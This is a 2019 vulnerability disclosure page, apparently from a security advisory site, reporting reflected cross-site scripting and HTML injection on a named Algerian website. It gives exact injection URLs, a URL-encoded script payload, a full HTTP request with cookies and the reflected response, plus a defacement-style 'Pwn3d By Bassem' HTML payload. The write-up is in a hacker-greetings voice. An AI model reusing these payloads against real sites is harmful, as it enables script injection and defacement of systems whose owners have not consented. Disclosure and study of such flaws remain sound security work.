inpe.dz Reflected Cross Site Scripting [ XSS ] | HTML Injection

2019.05.13
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

############################################################# # Title : inpe.dz Reflected Cross Site Scripting [ XSS ] | HTML Injection # Author : : Dj3Bb4rAn0n ( bassem ) FB/djebbar.bassem.16 # Date : /11/05/2019 # Home : Annaba ( Algeria ) # Tested on : Linux ( Backbox ) # Vendor : finpe.dz ############################################################# [ + ] PoC : # XSS --------- # inpe.dz/fr/?action=recherche&rubrique=Résultat de la recherche < ==== Inject here # Payload : %3Cscript%3Ealert%28%2Fhacked%2F%29%3C%2Fscript%3E ----------- # inpe.dz/fr/?action=recherche&rubrique=Résultat de la recherche%3Cscript%3Ealert%28%2Fhacked%2F%29%3C%2Fscript%3E --------------------------- Post Request ---------------------------------- POST /fr/?action=recherche&rubrique=R%C3%A9sultat%20de%20la%20recherche HTTP/1.1 Host: inpe.dz User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:66.0) Gecko/20100101 Firefox/66.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://inpe.dz/fr/index_acc.php Content-Type: application/x-www-form-urlencoded Content-Length: 64 Connection: close Cookie: fcspersistslider1=2; _ga=GA1.2.394734774.1557577567; _gid=GA1.2.1399442410.1557577567; style=null; __utma=67517641.394734774.1557577567.1557577593.1557583549.2; __utmz=67517641.1557583549.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/; __atuvc=41%7C19; __atuvs=5cd6d6bade5c6855014; __utmb=67517641.21.10.1557583549; __utmc=67517641; __utmt=1 Upgrade-Insecure-Requests: 1 recherche_mot=%3Cscript%3Ealert%28%2Fhacked%2F%29%3C%2Fscript%3E ----------------------------- ---------------------- Response ---------------------------------- HTTP/1.1 200 OK Date: Sat, 11 May 2019 14:38:26 GMT Server: Apache Upgrade: h2 Connection: Upgrade, close Accept-Ranges: none Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Length: 57434 --------------------------------------------------------------------- <div class="container" > <div class="content_left"> <h3>&nbsp;R&eacute;sultat de la recherche</h3><script>alert(/hacked/)</script> <script language="javascript" type="text/javascript"> ------------------------------------ The javascript code injected ----------------------------------- # Html injection ------------------- # inpe.dz/fr/?action=recherche&rubrique=Résultat de la recherche <===== Inject here # Payload : <center><h1>Pwn3ed By Bassem</h1></center> # http://inpe.dz/fr/?action=recherche&rubrique=R%C3%A9sultat%20de%20la%20recherche%3Ccenter%3E%3Ch1%3EPwn3d%20By%20Bassem%3C/h1%3E%3C/center%3E ======================================================= SHOOTZ TO : | Jag gar | Lakarha_23 | Bl4ck =======================================================


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top